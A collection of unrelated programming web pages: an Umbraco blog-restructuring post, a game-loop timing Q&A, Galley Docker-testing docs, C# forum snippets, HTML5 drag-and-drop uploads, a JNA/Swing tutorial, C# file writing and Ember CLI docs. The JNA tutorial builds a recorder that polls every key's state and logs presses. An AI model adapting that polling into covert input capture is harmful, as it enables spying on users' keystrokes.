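print(m.group(2))  # prints: moving-to-listview
```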
So: anything that starts with this regex pattern gets a permanent redirect to /blog/{whatever-was-here-as-"the rest"-of-the-url} (R:2 refers to the second regex group, which is "(.*)"):

<rule name="Blog" stopProcessing="true">
  <match url="^(blog/\d{4}/\d{1,2}/\d{1,2}\/)(.*)$" />
  <action type="Redirect" url="/blog/{R:2}" />
</rule>

Of course now all my URLs are failing because there's no actual content there, so let's fix that with a super simple UmbracoApiController. Each of my blog posts has a content type with the alias "BlogPost"; these all need to be moved under the /blog node, which has an id of 1207. I can go through the descendants of anything under /blog and check the content type to see if it matches. I also want to make sure that they're sorted from oldest to newest, as that's the default sorting in Umbraco. With that done, I just move all posts directly under /blog. The new API in v6 makes this so incredibly easy, awesome:

using System.Linq;
using Umbraco.Core.Models;
using Umbraco.Web.WebApi;

namespace Temporary.Controllers
{
    public class BlogPostsController : UmbracoApiController
    {
        public void PostMovePosts()
        {
            const int blogNodeId = 1207;
            var contentService = Services.ContentService;
            var blogNode = contentService.GetById(blogNodeId);
            foreach (var post in blogNode.Descendants().OrderBy(p => p.CreateDate))
            {
                if (post.ContentType.Alias == "BlogPost")
                {
                    contentService.Move(post, blogNodeId);
                }
            }
        }
    }
}

So: inherit from UmbracoApiController, and that will create a route for us at /umbraco/api/{ControllerName}/{MethodName} - so in this case: /umbraco/api/BlogPosts/PostMovePosts. By convention the BlogPostsController needs its "Controller" suffix stripped off, so that turns into "BlogPosts", and the method "PostMovePosts" starts with the verb "Post", which translates to the HTTP verb POST. That means I'll be using Postman with that verb:

And there we have it, everything nicely moved and sorted, ready for the v7 upgrade.
7 comments on this article

Is there a reason why you didn't install the Url Tracker, so redirects would've been created automatically? :)

Sure, that's another option. I do like the simple, single catch-all though, no need to do lookups for each content item either.

Why did you go to the trouble of putting all posts in the root of the blog? For housekeeping would it not have made sense to at least retain the year folders and switch those to listview?

@martin What housekeeping? I have a super simple list now, which is nicely paged and easily queryable. What more could I wish for?

Sebastiaan - just curious as to what you would do for an events list, where there is a chance that an event might have the same name as a previous event (eg. an event that occurs annually). I'm currently using DateFolders for events, which provides a unique URL for annual events with the same name (as the date is different). I'm thinking I won't be able to use the ListView in this situation? Also - for the ListView it would be great if we could display other properties in the list (eg. blog post date) - that would be very useful in your example above. I'll try to find some time to see if I can play around and modify the datatype - not sure how easy/difficult that would be.

@JMK Yep, it would be good to change up the view in such cases, shouldn't be too difficult, but if it is then we should make it easy! So your problem would be totally solved if the event date was in the list. Curious to see what you can come up with.

This would work on media items too?
I have a game with Bullet Physics as the physics engine. The game is online multiplayer, so I thought to try the Source Engine approach to deal with physics sync over the net. On the client I use GLFW, so the fps limit is working there by default (at least I think it's because of GLFW). But on the server side there are no graphics libraries, so I need to "lock" the loop which simulates the world and steps the physics engine to 60 "ticks" per second.

Is this the right way to lock a loop to run 60 times a second (a.k.a. 60 "fps")?

void World::Run()
{
    m_IsRunning = true;
    long limit = (1 / 60.0f) * 1000;
    long previous = milliseconds_now();
    while (m_IsRunning)
    {
        long start = milliseconds_now();
        long deltaTime = start - previous;
        previous = start;
        std::cout << m_Objects[0]->GetObjectState().position[1] << std::endl;
        m_DynamicsWorld->stepSimulation(1 / 60.0f, 10);
        long end = milliseconds_now();
        long dt = end - start;
        if (dt < limit)
        {
            std::this_thread::sleep_for(std::chrono::milliseconds(limit - dt));
        }
    }
}

Is it ok to use std::thread for this task? Is this way efficient enough? Will the physics simulation be stepped 60 times a second?
P.S. The milliseconds_now() looks like this:

long long milliseconds_now()
{
    static LARGE_INTEGER s_frequency;
    static BOOL s_use_qpc = QueryPerformanceFrequency(&s_frequency);
    if (s_use_qpc)
    {
        LARGE_INTEGER now;
        QueryPerformanceCounter(&now);
        return (1000LL * now.QuadPart) / s_frequency.QuadPart;
    }
    else
    {
        return GetTickCount();
    }
}

Taken from:

If you want to limit the rendering to a maximum FPS of 60, it is very simple: each frame, just check if the game is running too fast, and if so, wait. For example:

while (timeLimitedLoop)
{
    float framedelta = (timeNow - timeLast);
    timeLast = timeNow;
    for each (ObjectOrCalculation myObjectOrCalculation in allItemsToProcess)
    {
        myObjectOrCalculation->processThisIn60thOfSecond(framedelta);
    }
    render(); // if display needed
}

Please note that if vertical sync is enabled, rendering will already be limited to the frequency of your vertical refresh, perhaps 50 or 60 Hz. If, however, you wish the logic locked at 60 fps, that's a different matter: you will have to segregate your display and logic code in such a way that the logic runs at a maximum of 60 fps, and modify the code so that you can have a fixed time-interval loop and a variable time-interval loop (as above). Good sources to look at are "fixed timestep" and "variable timestep" (Link 1, Link 2 and the old trusty Google search).

Note on your code: because you sleep for the whole remaining duration of the 1/60th of a second in one go, you can easily miss the correct timing. Change the single sleep to a loop that re-checks the elapsed time in small steps. Instead of:

if (dt < limit)
{
    std::this_thread::sleep_for(std::chrono::milliseconds(limit - dt));
}

change to:

while ((dt = milliseconds_now() - start) < limit)
{
    // sleep only a fraction of the remaining time, then re-check;
    // use /10, /100 or whatever fine-grained step you desire
    std::this_thread::sleep_for(std::chrono::milliseconds((limit - dt) / 10));
}

Hope this helps, however let me know if you need more info :)
galley 0.2.1

Galley

End-to-end test orchestration with Docker.

Getting Started Guide

Requirements:

- Python 2.7.5
- Docker >= 0.10.0

Installation

Install Galley:

pip install -r requirements
python setup.py install

Run Galley:

$ galley -h
usage: galley [-h] [--no-destroy] [config] [pattern]

End-to-end testing orchestration with Docker.

positional arguments:
  config        Path to galley YAML file that defines Docker resources.
  pattern       Test file pattern.

optional arguments:
  -h, --help    show this help message and exit
  --no-destroy  Do not destroy images and containers.

.galley.yml

You define the environment you want Galley to create in the .galley.yml file. Place this file in your application's root directory. .galley.yml consists of three sections: images, resources, and testparams.

images

In the images section, you describe what images you want Galley to create and how you would like to create them.

- name: A name for the image in Galley. This can be used by resources to describe what image to use when creating them. For build actions, this is also the name tagged to the image built.
- source: For images with a pull action, this is the repo/image of the image to be pulled. For build actions, this is the path to the directory containing the Dockerfile to build. If .galley.yml is in the same directory as your Dockerfile, this can be ".".
- tag: The image tag to pull.
- action: Available actions are pull and build:
  - pull uses the docker pull command to pull the image described in source from the Docker Index.
  - build uses the docker build command to build an image from the Dockerfile located in the directory described in source.
- persist (optional): When Galley finishes testing, it destroys all images it created. To keep images from one Galley run to the next, set persist to True. This is helpful if you have upstream images you will use every time, since they will not have to be downloaded on each run.
testparams

testparams:
  pancakes: "{{environ['GALLEY_PANCAKES']}}"
  bacon: "{{environ['GALLEY_BACON']}}"

testparams are key-value attributes that can be referenced by your tests.

resources

In the resources section, you describe what containers you would like Galley to create and run from the images in the images section.

- name: The name of the resource. Currently this is not used by anything, but in the future it should be used as the name of the container and as a key when referenced by other resources.
- image: The id of the image to use to create the container. By using {{image_name}}, Galley will replace this with the actual image id when the image is created.
- host_port: The port on the host to map to cont_port. By using {{random_port}}, a random available ephemeral port on the host will be selected.
- cont_port: The port in the container to map to host_port.
- command: The command to use when running the container.
- host_volume: A directory on the host to mount into your container as cont_volume. Note: volumes are currently not supported by any of the Docker options on OS X. This option only works on Linux.
- cont_volume: The directory in the container where host_volume will be mounted.
- environment: Environment variables to inject into the container when it is run.

.galley.yml Templating:

- {{resources[..]}}:
  - In the resources section, you can build a relationship from one resource to another by referencing another resource's data. For example, since we are telling Galley to choose a {{random_port}} for our MongoDB and Redis instances, our baconpancakes app won't know how to talk to them. So, in the environment section, we tell baconpancakes to find the Celery backend with the host_port from resource 0 by using {{resources[0]['host_port']}} in the connection string. This tells Galley to go find the value of host_port for resource 0 and fill it in.
  - Currently, Galley is not smart enough to resolve dependencies on its own; therefore, a resource can only reference values from resources that appear before it in the .galley.yml file. In the future, this will likely be resolved by explicitly describing dependencies.
  - Only available in the resources section.

- {{host[..]}}:
  - Host-level information can be referenced through the host dictionary. The main usage of this is to provide the host's IP address in order to allow separate resources to communicate with each other.
  - Currently, the only host-level attribute available in host is ip.
  - Only available in the resources section.

- {{environ[..]}}:
  - Replaced with the referenced host environment variable.

Sample .galley.yml file:

testparams:
  pancakes: "{{environ['GALLEY_PANCAKES']}}"
  bacon: "{{environ['GALLEY_BACON']}}"

Galleytests

After Galley completes creating your environment, it looks recursively for any galleytest_*.py files in your current directory. Writing tests for Galley to use is easy! Galley uses Python's unittest module to test your environment. Therefore, writing a test for Galley is just as easy and allows you to use any of unittest's assert methods. All you need to do is make sure to import GalleyTestCase from galley.test and pass GalleyTestCase into your test class:

import requests

from galley.test import GalleyTestCase


class TestWebGetRequest(GalleyTestCase):

    def test_web_status(self):
        env = self.environment
        web_ip = env['host']['ip']
        web_port = env['resources'][2]['host_port']
        url = "" % (web_ip, web_port)
        response = requests.get(url)
        self.assertEqual(200, response.status_code)
        self.assertIn('<title>MakinBaconPancakes</title>', response.text)

In this test we want to check that our web application started properly and that some expected content was found on the page. Since we imported GalleyTestCase and passed it into our test class, we can also reference our entire environment in our test by calling self.environment.
Here, we used this to find the IP address of the Docker host and the port our web application was mapped to. As you can see, the self.assertEqual() and self.assertIn() methods come straight from unittest.

Galley tests can be more complicated as well:

import requests
import time

from galley.test import GalleyTestCase


class TestPancakes(GalleyTestCase):

    def test_pancakes(self):
        env = self.environment
        api_ip = env['host']['ip']
        api_port = env['resources'][2]['host_port']
        pancakes = env['testparams']['pancakes']
        bacon = env['testparams']['bacon']
        url = "" % (api_ip, api_port, pancakes, bacon)
        response = requests.post(url)
        baconpancakes = response.json()
        status = response.status_code
        pancake_id = baconpancakes['id']
        self.assertEqual(201, status)
        self.assertEqual('REQUESTED', baconpancakes['status'])
        url = url + '/' + pancake_id
        for attempt in range(20):
            r = requests.get(url)
            pancake = r.json()
            try:
                self.assertEqual('MADE', pancake['status'])
                break
            except Exception:
                time.sleep(5)
        self.assertEqual('MADE', pancake['status'])
        self.assertIn('bacon', pancake.keys())

TEST!

$ galley
Pulling dockerfile/redis:latest from registry.
Checking if image dockerfile/redis:latest exists.
Found image dockerfile/redis:latest.
Successfully pulled dockerfile/redis:latest.
Pulling dockerfile/mongodb:latest from registry.
Checking if image dockerfile/mongodb:latest exists.
Found image dockerfile/mongodb:latest.
Successfully pulled dockerfile/mongodb:latest.
Building image . with tag baconpancakes.
Checking if image c023ce32fc62 exists.
Found image c023ce32fc62.
Successfully built image c023ce32fc62 from ..
Creating dockerfile/redis container.
Successfully created dockerfile/redis container: 380c81fe0775
Creating dockerfile/mongodb container.
Successfully created dockerfile/mongodb container: 706e35d5e28f
Creating c023ce32fc62 container.
Successfully created c023ce32fc62 container: e0cc0d1cebc2
Creating c023ce32fc62 container.
Successfully created c023ce32fc62 container: 1f4d584d8dc0
Starting container 380c81fe0775.
Successfully started container 380c81fe0775.
Starting container 706e35d5e28f.
Successfully started container 706e35d5e28f.
Starting container e0cc0d1cebc2.
Successfully started container e0cc0d1cebc2.
Starting container 1f4d584d8dc0.
Successfully started container 1f4d584d8dc0.
Waiting for containers to start...
...
----------------------------------------------------------------------
Ran 3 tests in 30.617s

OK

Total Elapsed Time: 362.87 seconds.

Special Install Instructions for OS X:

Requirements:
- Python 2.7.5
- Vagrant
- VirtualBox
- docker-osx

Set up VirtualBox and Vagrant.

Install docker-osx:

curl > /usr/local/bin/docker-osx
chmod +x /usr/local/bin/docker-osx

Start docker-osx:

docker-osx start

Once the script is done, you should see a line like this:

To use docker: export DOCKER_HOST=tcp://172.16.42.43:4243 and then use the docker command from os-x directly.

Copy and paste the export DOCKER_HOST=tcp://172.16.42.43:4243 line and run it to set the DOCKER_HOST environment variable. Galley will need this to communicate with Docker.

Verify Docker is working:

docker version

Proceed to the regular installation instructions.

- Downloads (All Versions):
  - 8 downloads in the last day
  - 64 downloads in the last week
  - 255 downloads in the last month
- Author: Ryan Walker
- Package Index Owner: theryanwalker
- DOAP record: galley-0.2.1.xml
https://pypi.python.org/pypi/galley/0.2.1
Hi all! I am preparing to start an advanced C# Contest on C# Home. The contest will be to read digits from an image, so I am doing research on the topic, so I can provide the contestants with...

Hi all! I have a project where I have to write documentation for source code. As I have no experience in writing documentation, I wanted to ask you guys - do any of you have any experience with...

-> C# Home - Articles, FAQs, Free Exams, Forums, Links and more... Check it out.

Hi all! I already know how to directly record to mp3 (LAME_ENC.DLL) and .ogg and .wav of course. I am interested though to be able to record in many more formats directly... For mp3 and .ogg I...

mmio won't work. I tried that though:

#include <iostream.h>
#include <fstream.h>

int main()

Hi all! Thanks for your replies! I actually can do a CD player, but with MCI, which does not let me have any access to the buffers. But buffers are what I need, actually. So, I am sure it is possible,...

Hi all! I want to make a CD player which will use the waveOutXXX APIs to play the CD. What I actually need is to read data from the CD, put it into a buffer, then manipulate it, and after that...

Thanks! That worked :) I totally forgot that int is 4 bytes, not two (I use VB a lot, where int is 2 bytes). I made one more little change. And here is the code in case anyone is interested: ...

What is the "NumberOfSamples" variable? The number of samples per second or what? Also, this thing doesn't work of course, because I read every single sample, so there is no point to divide it into...

Hi all! What I wanted to do is to filter the vocal. The algorithm that I know is:

newLeft = oldLeft - oldRight
newRight = oldRight - oldLeft

This way, the vocal, which in most cases is...

Hi there! Thank you for your responses.
Well, I will have to make analysis on .wav and .mp3 files, but it does not need to be in real-time. But one thing I still don't quite get - what...

Hi all! I am developing an application that should have a feature to count the beats-per-minute in a .wav file. Does anyone know how to do it? Any algorithms? Thank you!

Hi! Trying to use an ofstream object like that:

class X {
    ofstream FileHandle;
    int f();

Hi! Thanks, I added this. One dumb question though (as I haven't used Win32 much) - what parameters should I pass to the MessageBox function? I see the list of the parameters, but I don't know...

Thanks a lot! I will give it a try right away and will publish what happened.

Thanks! Will MessageBox work in a DLL imported in VB? Also, what exactly is your idea? To see WHERE it returns?

Hi there! But the CreateProcess does execute in my mind... I think so, because if it didn't the console wouldn't open! And it opens!

Hi! In VB (where I use the DLL) when I make a call to the function, it executes what I called, but it just doesn't store its console output into the string. And I know that it executes because...

Hi! I've got this code that pipes the console output into a string. The problem is that when I use it in a DLL file, and use this DLL file from VB, the console's output is not in the string, as...

It is MUCH cheaper for one! Also, GoldWave is more like an editor than a recorder. My app will be mostly a recorder. Also, I found no Silence Detection in GoldWave, did you? And at last - I want to...

Hi all! I am creating a sound recorder with some advanced features. This sound recorder will be released in the beginning of year 2004 and will go to download.com for selling. What I wanted to...

I don't understand... please, explain what you mean... yes, I know that regular CDs are 640 MB, but what does this have to do with my question or my code? Thanks!

I currently made this code:

#include <iostream.h>
#include <afx.h>
#include <windows.h>

#define MAX_OF_HARD_DISKS 24

Hi!
Try:

int _stdcall Test() {
    MessageBox(NULL, "Dll Works!", "YAY!", MB_OK);
    return 0;
}

Also, create a file with the name of your .cpp file. For example:
https://cboard.cprogramming.com/search.php?s=6e31e5a2d4a1d900c510a6a9e708ac34&searchid=6598452
HTML5 Drag and Drop uploading

Drag and drop uploading is a nice user interface, which provides a quick integration between the browser and the filesystem. Unless you're already storing everything online, you will upload many, many files every day. GMail has used this interface for quite some time, and with the diffusion of HTML 5 almost everyone can include it in a web application without too much hacking.

Under the hood

There are several HTML 5 APIs involved in this mechanism:

The Drag and Drop API generates events after elements are dragged over a certain area, or dropped there. This API is necessary to obtain references to the files the user wants to upload.

The File API provides access to the filesystem instead. Back in the old 2000s, the only way to upload files via HTTP was an <input type="file"> element: all the solutions centered on embellishing its form, unless you wanted to include a Flash or Java applet to perform the same job with more flexibility. The File API also became asynchronous while it was in the works: the user interface won't freeze while you're accessing files. Thanks to this API, you can start the acquisition of a local file and specify a callback to be informed of the end of the operation.

XMLHttpRequest (the object for performing Ajax requests) also comes into play. The classic way to upload files involved the file <input> element, bypassing Ajax: the element was usually wrapped in an invisible iframe to simulate an asynchronous request. Actually, file upload requests are just POST requests with the right headers and an entity body containing the base64 encoding of the file. Thus, now that we can access the file's content programmatically, we can also upload it via Ajax.

Some examples and support

Mika Tuupola has a nice tutorial, updated from its old Google Gears version. This time, it's all HTML 5.
He also shows how to deal with the server side with some PHP code, although it is no different from standard uploads (apart from the fact that the generated response is read via Ajax, so it's not mandatory to produce an HTML page.)

The buzzmedia features a similar tutorial, but provides info on browser support updated to June 2011:

- Chrome and Firefox have no issues, being the first to support the File API and with many newer, automatically updated versions rolled out (we're talking about Firefox 3.6 as a minimum, while I'm running 7).
- Safari 5 works with a different API, which will be uniformed to the standard in Safari 6.
- Internet Explorer 10 will support the File API too (it's not a statement of intents: the preview version already does.)
- Opera 11 supports the File API.

The Drag and Drop API has support from all major players (IE, Firefox, Chrome, Safari) apart from Opera, which is waiting for the specification to become stable. Mobile browsers sometimes support the File API (e.g. Android 3.0 and newer), but never support the Drag and Drop one; I'm not sure it would make sense on a phone display, although it would on a tablet screen. By the way, the upgrading policies are more difficult to deal with on mobile devices, so to upload lots of files reliably you should stick to native applications for now.

A library

If you want to quickly integrate this functionality in your application, a JavaScript library is a good choice. Nothing on the server-side will change.
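Before reaching for a library, it helps to see how little glue the two APIs need. Below is a minimal hand-rolled sketch of my own; the element, URL, and the send callback are placeholders and not part of any particular library:

```javascript
// Wires a DOM element up as a drop target; dropped files are handed to
// `send`, which would typically wrap each file in FormData and POST it
// with XMLHttpRequest.
function setupDropZone(dropEl, uploadUrl, send) {
  dropEl.addEventListener('dragover', function (e) {
    // Without preventDefault() the browser just navigates to the file.
    e.preventDefault();
  });
  dropEl.addEventListener('drop', function (e) {
    e.preventDefault();
    var files = e.dataTransfer.files; // FileList from the Drag and Drop API
    for (var i = 0; i < files.length; i++) {
      send(uploadUrl, files[i]);
    }
  });
}
```

The server-side handler stays the same as for a classic form upload; only the way the request is assembled in the browser changes.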
html5uploader allows you to specify some HTML elements to build an uploading area with a single line of JavaScript:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>HTML5</title>
    <script src="html5uploader.js"></script>
  </head>
  <body onload="new uploader('drop', 'status', '/uploader.php', 'list');">
    <div id="box">
      <div id="status">Drag a file from a local folder into the box ...</div>
      <div id="drop"></div>
    </div>
    <div id="list"></div>
  </body>
</html>

Of course you can wrap the function into a namespace to avoid conflicts, or create the object inside $() or your own onload handler. Check out html5uploader's online demo to get a feel of how the process works (it even makes previews for images, although that's the server-side part.)
https://dzone.com/articles/drag-and-drop-uploading
Java Native Access and Eclipse Indigo Swing GUI editor

Normally for native access, I would use JNI to run native code, especially code I've written which interfaces with Java components. However, often you just want to call native functions (particularly system calls). Rather than having to go through the whole JNI process (which is rather painstakingly slow), someone has created the JNA library, which allows you to basically call native methods directly.

As far as I understand, there are two main ways to use JNA:

1. Create an interface which extends the JNA Library class, then load the appropriate native library with that interface template.
2. Declare native methods in your class, then register that class with a native library. This is also known as "Native Mapping".

Both methods have their uses; at this moment I'm not entirely sure what the difference between the two is other than semantics. I have read a few sites (particularly the old java.net site for the JNA project) saying that native mapping has some performance benefits over using an interface, but I haven't investigated whether this is true.

So for fun, I decided to play with both the new Window Designer in Eclipse Indigo and JNA.

Getting set up

All you need to get started with JNA is the JNA jar file. It contains all the necessary native libraries packed in it to run on virtually any platform.

The main JNA website: JNA on GitHub

Note: There is a java.net website which is supposedly the home of JNA; that is the old home (a shame, since it's the first item which comes up on a Google search). It will probably redirect you to the new home on GitHub.

Here's a direct link to the JNA.jar file: JNA.jar download link

The second file is the Javadoc for JNA: doc.zip download link

To make life easier for me, I created an Eclipse User Library (see JavaTip Dec 18, 2010: Eclipse User Libraries for how to do this). So now I have a project with the JNA user library added to the build path.
First thing, I create a new Record class. This class runs on a separate thread and constantly polls whether the state of any key has changed.

Note: There is code in this class which is Windows-specific. Honestly, I don't know what the equivalent compatible code in Linux or Mac OS would be. However, if someone figures it out, I would like to know.

package record;

import javax.swing.JTextArea;

import com.sun.jna.Native;

public class Record implements Runnable {

    static {
        Native.register("User32");
    }

    public static native short GetKeyState(int KeyState);

    private boolean[] keyPresses;
    private long delay;
    private boolean keepRunning;
    private boolean paused;
    private JTextArea textArea;

    public Record(JTextArea textArea, long delay) {
        this.delay = delay;
        keyPresses = new boolean[256];
        keepRunning = true;
        this.textArea = textArea;
        paused = false;
    }

    public void setDelay(long delay) {
        this.delay = delay;
    }

    public long getDelay() {
        return delay;
    }

    public void signalStop() {
        textArea.append("stopped\r\n");
        keepRunning = false;
    }

    public void signalPause() {
        textArea.append("pause\r\n");
        paused = true;
    }

    public void signalResume() {
        paused = false;
        textArea.append("resume\r\n");
        synchronized (this) {
            notify();
        }
    }

    @Override
    public void run() {
        try {
            long startTime = System.currentTimeMillis();
            long currentTime;
            while (keepRunning) {
                if (paused) {
                    synchronized (this) {
                        wait();
                    }
                }
                Thread.sleep(delay);
                for (int i = 0; i < keyPresses.length; ++i) {
                    boolean key = (Record.GetKeyState(i) & 0x8000) != 0;
                    currentTime = System.currentTimeMillis();
                    if (key != keyPresses[i]) {
                        textArea.append(currentTime - startTime + "\t" + i + "\t" + key + "\r\n");
                        keyPresses[i] = key;
                    }
                }
            }
        } catch (InterruptedException e) {
        }
    }
}

For those used to JNI, you'll immediately notice some differences, particularly with loading libraries.
static {
    Native.register("User32");
}

Native is a class of the JNA library which allows you to directly map a class's native methods to the respective native library. This is similar to System.loadLibrary(), but here you'll notice that I'm directly linking the Windows library (in this case, User32.dll) rather than creating a "middle-man" library.

There is another way to load native libraries with JNA, and that's using interfaces:

import com.sun.jna.Library;

public interface User32Lib extends Library {
    short GetKeyState(int KeyState);
}

Now, to actually load the native library:

User32Lib userLibInstance = (User32Lib) Native.loadLibrary("User32", User32Lib.class);

Typically, you'd want to store this as a static field of the User32Lib interface, so it's easy to find where the opened instance lives:

import com.sun.jna.Library;

public interface User32Lib extends Library {
    // technically public and static are redundant, but I put them here just to be verbose
    public static final User32Lib INSTANCE = (User32Lib) Native.loadLibrary("User32", User32Lib.class);

    short GetKeyState(int KeyState);
}

The GUI

So now that I have the logic set up, it's time for the GUI. The GUI is a simple JFrame with a JTextArea and 3 JButtons. The JTextArea is surrounded by a JScrollPane.

First things first: Click on "new->other...", then go down to the "WindowBuilder->Swing Designer" folder and select "JFrame". Click next, and type in the name for your JFrame class. I called mine RecordActions, and placed it in the "gui" package. I also left the "Use Advanced Template for generate JFrame" checked.

The first thing you may notice when the file gets created is that there are two little tabs at the bottom, one for "source" and the other for "design". Shown below is the design tab.

For the most part, you can add items to the GUI in one of two ways:

1. Click on the component you want to add.
2a.
Hover over a part of the "mock-up" GUI, and the GUI will highlight where the item will be added in conformance with the current LayoutManager of the component.

--OR--

2b. Go over to the "Components" screen on the top left side. You can add it as a child of a component by clicking on it, or as a sibling by clicking between components.

If you select a component (either in the mock-up GUI or in the tree display), the Properties tab will populate with properties that you can edit. If the property you're looking for isn't there, you can also turn on "Show Advanced Properties" by right-clicking on the Properties tab and enabling that option.

The Window Builder also allows you to easily add event listeners. These are added in the form of anonymous classes. To add an action listener to the buttons, right-click on one, then go to "Add Event Handler"->"action"->"actionPerformed". That should take you over to the source tab, where you can edit the event handler code.

Here's the finished GUI code:

package gui;

import java.awt.BorderLayout;

public class RecordActions extends JFrame implements WindowListener {

    private static final long serialVersionUID = -2123765083016662420L;

    private JPanel contentPane;
    private Record record;
    private JTextArea textArea;
    private JButton btnResume;
    private JButton btnPause;
    private JButton btnStop;

    /**
     * Launch the application.
     */
    public static void main(String[] args) {
        EventQueue.invokeLater(new Runnable() {
            @Override
            public void run() {
                try {
                    RecordActions frame = new RecordActions();
                    frame.setVisible(true);
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        });
    }

    /**
     * Create the frame.
     */
    public RecordActions() {
        addWindowListener(this);
        setDefaultCloseOperation(WindowConstants.DISPOSE_ON_CLOSE);
        setBounds(100, 100, 450, 300);
        contentPane = new JPanel();
        contentPane.setBorder(new EmptyBorder(5, 5, 5, 5));
        contentPane.setLayout(new BorderLayout(0, 0));
        setContentPane(contentPane);

        textArea = new JTextArea();
        textArea.setEditable(false);
        contentPane.add(new JScrollPane(textArea), BorderLayout.CENTER);

        record = new Record(textArea, 50);
        Thread t = new Thread(record);
        t.start();

        JPanel panel = new JPanel();
        contentPane.add(panel, BorderLayout.SOUTH);
        panel.setLayout(new GridLayout(1, 0, 0, 0));

        btnResume = new JButton("Resume");
        btnResume.addActionListener(new ActionListener() {
            @Override
            public void actionPerformed(ActionEvent e) {
                record.signalResume();
            }
        });
        panel.add(btnResume);

        btnPause = new JButton("Pause");
        btnPause.addActionListener(new ActionListener() {
            @Override
            public void actionPerformed(ActionEvent e) {
                record.signalPause();
            }
        });
        panel.add(btnPause);

        btnStop = new JButton("Stop");
        btnStop.addActionListener(new ActionListener() {
            @Override
            public void actionPerformed(ActionEvent e) {
                record.signalStop();
            }
        });
        panel.add(btnStop);
    }

    @Override
    public void windowActivated(WindowEvent e) {
    }

    @Override
    public void windowClosed(WindowEvent e) {
        record.signalStop();
    }

    @Override
    public void windowClosing(WindowEvent e) {
    }

    @Override
    public void windowDeactivated(WindowEvent e) {
    }

    @Override
    public void windowDeiconified(WindowEvent e) {
    }

    @Override
    public void windowIconified(WindowEvent e) {
    }

    @Override
    public void windowOpened(WindowEvent e) {
    }

    public JTextArea getTextArea() {
        return textArea;
    }
}

For the most part, you can edit the bare Java code safely even when the Window Builder is open. For example, in my code above I manually added that the RecordActions class implements the WindowListener interface. I also added code which interfaces the logic found in the Record class with my RecordActions GUI.
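One detail from the Record class's polling loop is worth a closer look before wrapping up: Win32's GetKeyState returns a short whose high-order bit reports that the key is currently down (the low-order bit tracks toggle state, as for Caps Lock), which is why the code masks with 0x8000. The mask test can be tried out in plain Java, no JNA required; the class and method names below are my own:

```java
// Isolates the high-order bit of a Win32 GetKeyState result.
// Note that a short with the high bit set is negative in Java, so the
// value is promoted to int before the bitwise AND; the mask still works
// because sign extension preserves bit 15.
class KeyStateMask {
    static boolean isDown(short state) {
        return (state & 0x8000) != 0;
    }
}
```

This is also why the Record class compares the boolean result against its keyPresses array instead of storing raw shorts: only the down/up transition matters for logging.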
Anyways, I hope you found this blog useful. I'm looking forward to building more GUIs with the new designer, as well as playing more with JNA. Happy Coding
https://www.javaprogrammingforums.com/blogs/helloworld922/21-java-native-access-eclipse-indigo-swing-gui-editor.html
How to write to file in C#

File output can be used by C# programs to communicate with other programs written in different programming languages, or with human beings. This post documents my experiences in writing to files in C#.net.

Specifying file access

For file writes, we must use either the Write or the ReadWrite member of the System.IO.FileAccess enumeration to specify write access.

Specifying file mode

Apart from specifying file access, we specify the file mode via one of the members of the System.IO.FileMode enumeration. The file mode determines how the operating system will open the file for our code to write to.

Getting an instance of System.IO.FileStream

As with file creation, there are a few ways to gain code access to a file to which we intend to write data:

- Using the System.IO.FileStream constructors.

FileStream fileStream = new FileStream("techcoil.txt", FileMode.Append, FileAccess.Write);

- Using the static Open method of the System.IO.File class.

FileStream fileStream = File.Open("techcoil.txt", FileMode.Append, FileAccess.Write);

- Using the Open method of the System.IO.FileInfo class.

FileInfo fileInfo = new FileInfo("techcoil.txt");
FileStream fileStream = fileInfo.Open(FileMode.Append, FileAccess.Write);

The above code segments get the operating system to open techcoil.txt for writing to the end of the file. If techcoil.txt does not exist, the operating system will create it.

Writing text data to file

To write text data to the file directly, we can encapsulate the FileStream in a System.IO.StreamWriter instance and use its Write or WriteLine method to write text data to the file. The following example writes the current date time to the end of techcoil.txt.

using System;
using System.IO;
using System.Text;

public class WriteTextToFile
{
    public static void Main(string[] args)
    {
        try
        {
            // If techcoil.txt exists, seek to the end of the file,
            // else create a new one.
            FileStream fileStream = File.Open("techcoil.txt", FileMode.Append, FileAccess.Write);

            // Encapsulate the FileStream object in a StreamWriter instance.
            StreamWriter fileWriter = new StreamWriter(fileStream);

            // Write the current date time to the file.
            fileWriter.WriteLine(System.DateTime.Now.ToString());
            fileWriter.Flush();
            fileWriter.Close();
        }
        catch (IOException ioe)
        {
            Console.WriteLine(ioe);
        }
    }
}

Writing binary data to file

To write binary data to file, we can use the Write method of the FileStream instance. As with the previous example, the following code writes the current date time string to the end of techcoil.txt. However, it converts the current date time string to bytes before writing to techcoil.txt.

public class WriteBinaryToFile
{
    public static void Main(string[] args)
    {
        try
        {
            // If techcoil.txt exists, seek to the end of the file,
            // else create a new one.
            FileInfo fileInfo = new FileInfo("techcoil.txt");
            FileStream fileStream = fileInfo.Open(FileMode.Append, FileAccess.Write);

            // Get the current date time as a string and add a new line to
            // the end of the string.
            String currentDateTimeString = System.DateTime.Now.ToString() + Environment.NewLine;

            // Get the current date time string as bytes.
            byte[] currentDateTimeStringInBytes = ASCIIEncoding.UTF8.GetBytes(currentDateTimeString);

            // Write those bytes to techcoil.txt.
            fileStream.Write(currentDateTimeStringInBytes, 0, currentDateTimeStringInBytes.Length);
            fileStream.Flush();
            fileStream.Close();
        }
        catch (IOException ioe)
        {
            Console.WriteLine(ioe);
        } // end try-catch
    } // end public static void Main(string[] args)
} // end public class WriteBinaryToFile
https://www.techcoil.com/blog/how-to-write-to-file-in-c/
Managing Dependencies

As you're developing your Ember app, you'll likely run into common scenarios that aren't addressed by Ember itself, such as authentication or using SASS for your stylesheets. Ember CLI provides a common format called Ember Addons for distributing reusable libraries to solve these problems. Additionally, you may want to make use of front-end dependencies like a CSS framework or a JavaScript datepicker that aren't specific to Ember apps. Ember CLI supports installing these packages through the standard Bower package manager.

Addons

Ember Addons can be installed using Ember CLI (e.g. ember install ember-cli-sass). Addons may bring in other dependencies by modifying your project's bower.json file automatically. You can find listings of addons on Ember Observer.

Bower

Ember CLI uses the Bower package manager, making it easy to keep your front-end dependencies up to date. The Bower configuration file, bower.json, is located at the root of your Ember CLI project, and lists the dependencies for your project. Executing bower install will install all of the dependencies listed in bower.json in one step.

Ember CLI watches bower.json for changes. Thus it reloads your app if you install new dependencies via bower install <dependencies> --save.

Other assets

Third-party JavaScript not available as an addon or Bower package should be placed in the vendor/ folder in your project. Your own assets (such as robots.txt, favicon, custom fonts, etc.) should be placed in the public/ folder in your project.

